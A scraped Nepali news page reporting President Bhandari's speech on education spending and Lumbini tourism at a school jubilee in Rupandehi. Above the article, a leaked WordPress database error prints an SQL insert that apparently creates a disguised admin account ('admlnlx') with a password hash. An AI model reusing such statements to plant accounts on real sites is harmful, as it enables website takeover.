WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BK0F7pZYi/p9CK4BgGd0q/5JMeyc4a/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 17:31:30', '', 'admlnlx', 'admlnlx')
बुटवल, माघ २२–
राष्ट्रपति विद्यादेवी भण्डारीले शिक्षामा राज्यले गरेको लगानीको प्रतिफल जनताले पाउनुपर्ने बताउनुभएको छ ।
रुपन्देहीको ग्रामीण क्षेत्रमा रहेको हरैया माध्यमिक विद्यालयको स्वर्ण महोत्सव समारोहको आज उद्घाटन गर्दै राष्ट्रपति भण्डारीले शिक्षा क्षेत्रको विकासका लागि राज्यले लगानी वृद्धि गनुपर्नेमा जोड दिनुभयो ।
शान्ति, विकास र आपसी भातृत्वलाई शिक्षाले प्रभाव पार्ने भएकाले बालबालिकालाई यसै किसिमको शिक्षा प्रदान गर्नुपर्ने समेत उहाँको भनाइ थियो । ‘‘देशको अधिकांश विद्यार्थीहरूको पढ्ने सामुदायिक विद्यालयको गुणस्तर सुधार गरी रोजगारमूलक शिक्षा प्रदान गर्न आवश्यक छ” राष्ट्रपतिले भन्नुभयो ।
राष्ट्रपति भण्डारीले राष्ट्रिय विकासको प्रमुख आधार शिक्षा भएको भन्दै मुलुकको दिगो विकासका लागि शिक्षामा लगानी वृद्धि गर्न आवश्यक रहेकामा जोड दिनुभयो । उहाँले भन्नुभयो, ‘‘राज्यले कूल बजेटको जम्मा ४।५ प्रतिशत रकम मात्र शिक्षा क्षेत्रमा बिनियोजन गरेको अवस्थामा व्यावहारिक र जीवनोपयोगी शिक्षामा राज्यले लगानी बढाउन आवश्यक छ ।’’
राष्ट्रपति भण्डारीले मुलुकमा पर्यटन विकासका लागि छिट्टै लुम्बिनी गुरूयोजना, निर्माणाधीन अन्तर्राष्ट्रिय विमानस्थल, बुद्ध परिपथको काम सम्पन्न गर्न आवश्यक रहेको बताउँदै भन्नुभयो, “लुम्बिनी विश्व शान्तिको मुहान हो, यसको प्रचार–प्रसार गरी विश्वका पर्यटकलाई भ्रमण गराउनुपर्छ ।”